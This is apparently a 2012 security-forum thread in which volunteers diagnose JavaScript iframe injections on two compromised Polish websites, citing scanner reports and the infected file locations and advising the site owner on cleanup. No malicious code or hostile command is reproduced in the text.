Zscaler does not flag, avast Webshield blocks as JS:Iframe-FH [Trj]

See: http://zulu.zscaler.com/submission/show/fe83f86ee97110233ea36510d56d6ee6-1333725183
Web rep 40/100: http://www.webutation.net/go/review/art-slub.com.pl
Bitdefender TrafficLight gives the page as unsafe.
Avast webshield protects us by blocking this as JS:Iframe-FH [Trj],

polonus

Using Web-Sniffer I get a 200 error, however using my special source code viewer I could view the source. :slight_smile:

Line 472 looks suspicious. Only smashed together coding and directly after the end jQuery tag.

Fixing up the coding, by adding spaces and tabs as necessary, I can clearly view the suspect code. See attached.

And yes, this detection is correct :wink:

Hi !Donovan,

Thank you for the heads-up on that, valid avast malcode block. Thanks for analyzing that for us,

polonus

Hey, i have this trojan on my Website since friday 22 april 2012, i`m looking for help to solve this problem, please help. My e-mail bartek@lingerie4u.pl, my webpage wxw.lingerie4u.pl

Please deactivate your link…!!!
→ Use wxw instead of www (See above…!)
http://zulu.zscaler.com/submission/show/7917bf94ed0fee5bc56a206bc920db6b-1335100563

Sucuri report: http://sitecheck.sucuri.net/results/http://www.lingerie4u.pl/
Malware entry: MW:IFRAME:HD564 http://sucuri.net/malware/malware-entry-mwiframehd564

virustotal
https://www.virustotal.com/file/3de58a51e6968c34c03d12dc4e2e54cd881ed9b1056c49ca121735553077ff29/analysis/1335102050/

wepawet - suspicious
http://wepawet.iseclab.org/view.php?hash=a9e9fb8e6b8b1fb267e5fceb299ebf1b&t=1335102390&type=js

Hi chochor,

A very infected site you have indeed. You are lucky that none of the major have decided to blacklist your site.

First, your jQuery file. (jquery-1.3.2.min.js)
Sucuri says on line 19, from “If(J===G)” down, contains the exploit. However, I did not see anything apparent in that script and decided to upload the part that looked like regular jQuery coding to VirusTotal. See: https://www.virustotal.com/file/3b992588ed7d8d7eac046b7f7f9ec353c9346004ab7645981deb0dddff5bf221/analysis/1335100855/

Thus, the coding before and after the /qpi/ tag contains the exploit. See attachment #1 for readable malscript.

I am unable to access jquery.jqzoom-1.0.1.js.

jquery.jqzoom1.0.1.js contains the same exploit. Line 1124. See attachment #2 for script to be removed.

Same with jquery.hoverIntent.minified.js and jquery.fancybox-1.3.1.js. Remove the coding before and after the /qpi/ tag.

I suggest you upgrade to jQuery 1.7.2.
http://docs.jquery.com/Downloading_jQuery

Your CSS files are NOT malicious. Zulu is warning of infection because they have links to your site, which is malicious.

Now for your HTML pages.

The homepage of your site is indeed infected. Check line 1518. Notice the and . Remove everything inbetween.

Same with your 404 pages, which I assume are generated by your 404javascript.js. Remove the coding before and after the tags.

bestsellery-c-96.html, nowosci-c-31.html, and promocje-c-113.html also contain the same exploit mentioned above.

The following PHP pages do as well:
advanced_search.php
contact_us.php
create_account.php
shopping_cart.php

Refrence: http://zulu.zscaler.com/submission/show/7917bf94ed0fee5bc56a206bc920db6b-1335100086
http://sitecheck.sucuri.net/results/http://www.lingerie4u.pl/

I’m assuming that the malcreants made a tool for javascript injection. Looks exactly alike. :-\

Your CSS files are NOT malicious. Zulu is warning of infection because they have links to your site, which is malicious.
yepp......just checked those at VT and they come up clean

Oki, thanks,

!Donovan are you able to fix this problem on my site, write on my prv bartek@lingerie4u.pl